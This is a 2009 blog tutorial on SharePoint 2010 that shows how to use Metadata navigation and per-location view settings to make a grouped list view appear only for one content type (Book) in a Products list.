You can configure available views for ANY NODE in the “Metadata navigation”. As a result, In addition to views per folder – depending on how you set up your Metadata navigation for your list – you can:

  • Define views that are available only on items of a particular Content Type (my favourite, demonstrated below)
  • Define views that are available only on items that have a particular value for a field of type single-value choice.
  • Define views that are available only on items that have a particular term applied to it on a field of type Managed metadata.

Let me demonstrate how to make our “Books Grouped by Author” view available only to our Book content type in our Products list, whilst hiding it for all other type of products in the list.

Below is a summary of all the steps. I will only discuss the last two steps where we configure Metadata navigation and the Per-location view settings, as this what this article is all about.

  1. Create custom list Products
  2. Create content types:
    1. Book (Title, Price, Author)
    2. Movie (Title, Price)
    3. Music Album (Title, Price, Artist)
  3. Configure list to allow management of Content Types
  4. Associate Book, Movie and Music Album with list and delete Item Content Type
  5. Populate list with items for each Content Type
  6. Create view Books Grouped by Author
  7. Configure Metadata navigation
  8. Configure Per-location view settings

Once we have successfully performed steps 1 to 6, we need to bring up the Metadata navigation settings screen for our list. The link to this page can be found on the List Settings page. In the Configure Metadata Hierarchies section, we need to select the “Content Type” item from the list on the left and move it to the right and press OK

As a result, we should now get a hierarchical navigation control on the left of our list.

Once that’s done, we need to bring up our Configure per-location view settings page. The link to this page can also be found on the List Settings page. On the left, there is a hierarchical control labelled “Location to Configure”. We need to use this to select the node (or Location if you like) to which we will be applying the configuration defined on the right. We start with the root node, which is selected by default. We don’t want our grouped view to be available at the root, so we select it in the “Views available at this location” list and move it to the “Views hidden from this location” list and press Apply. Next, we need to expand the “Content Type” node in the tree on the left and select Book. By default it is configured to inherit its settings from its parent, which it not what we want. Set this to No, and move the grouped view to the “Views available at this location” list. While we are at it, let’s move the All Items view to the “Views hidden from this location” list, so that our grouped view becomes the default view for the Book Content Type, and press OK.

Navigate to the list. When selecting Book in the Metadata Navigation on the left, the grouped view should now show instead of the All Items view. Note that  the Book Content Type node in the metadata navigation, is also the ONLY location where our grouped view is available.

On a final note, I noticed that the Per-location view settings link does not appear on the List Settings page when the list is contained in a Blank Site. I performed the actions above on a Team Site. Presumably certain Features needs to be activated to enable this functionality, however I currently don’t know which one. Also, I am not sure how much of this functionality depends on SharePoint Server 2010 and whether it will work on a SharePoint Foundation installation.

Written by jvossers

December 27, 2009 at 10:13 pm

Posted in SharePoint 2010